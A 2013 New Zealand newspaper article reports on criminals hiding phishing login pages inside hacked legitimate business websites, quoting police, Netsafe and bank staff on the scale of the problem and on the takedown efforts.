Genuine websites host net scams

04:54, Oct 30 2013

International cyber-criminals are preying on Kiwi companies, hiding scam pages within their websites to steal unsuspecting victims' personal details.

The sophisticated criminals are burying their "phishing" pages within legitimate websites to "host" their criminal activity, as they seek access to their victims' financial details.

The hacked companies are usually unaware, police say.

The national cyber-crime centre in Wellington has been closing down an average of one scam page every day - usually within an hour of finding it.

"Phishing sites attack businesses and their customers," Detective Clifford Clark said.

"They're after usernames, passwords, and any other information they can gain from you.


"The way they do it, they entice people to go to their sites via spam mail. It's a huge problem because of the impact it has on individuals.

"We've had businesses lose very large sums of money, and individuals as well."

The criminals set up a near-perfect replica of banking or email log-in pages and hide them within the framework of a different - legitimate - organisation's website. They will then send out a bulk spam email with a link to the bogus page, advising users that they need to log into their bank or email. The profile data will be stolen before the users are redirected to the real bank or email site to log in again. The only thing different will be the URL address at the top of the page. Everything else was identical, Dr Clark said.

"When you get to it, it will look [for example] just like your bank one. It will get you to put in your details. It's clever, they've got lots of little tricks."

One Kiwi website was found recently to have five phishing pages hidden within it, attempting to get log-in data from HSBC Bank customers, Yahoo, Maersk shipping clients and a gaming website.

Netsafe cyber-security programme manager Chris Hails said the number of phishing attacks on legitimate Kiwi businesses had risen sharply in the past few months.

The main target was small to medium businesses using cheap and vulnerable software to build their websites, which often left plenty of "back doors" for hackers.

"In the last month we have had more than 100 small businesses affected by this sort of thing," he said. Once the website had been hacked, a fake log-in page could be planted. Mass emails and even fake online job advertisements were then used to lure prospective victims to the page, where their credit card or log-in details were harvested.

The main perpetrators tended to be Eastern European groups, although Chinese scammers were "up and coming" in the phishing world, Dr Clark said.

"We are talking about organised crime, invariably offshore organised crime. They are professional phishermen."

The four-person cyber-crime team monitors the phishing sites and alerts the hacked companies and domain hosts to get the pages down as soon as possible.

"Every minute it's up there, there's more victims going to go through that page," Dr Clark said.

"We're aiming to get these things down within an hour of being notified, if possible.

"Sometimes they're down within minutes."

Internationally, banks, money transfer and e-commerce sites were the subject of more than three-quarters of the 72,758 unique phishing attacks recorded by the not-for-profit Anti-Phishing Working Group for the first half of this year.

ANZ fraud risk manager Peter Plowman said there had been a rise in the number of phishing scams piggybacking on the websites of legitimate New Zealand businesses. It was common for spam emails to be sent out directing customers to dummy websites pretending to be log-in pages for banks.

"We do get people trying to impersonate our sites," he said.

"There wouldn't be a week that goes by that we don't get a report on that."

The Dominion Post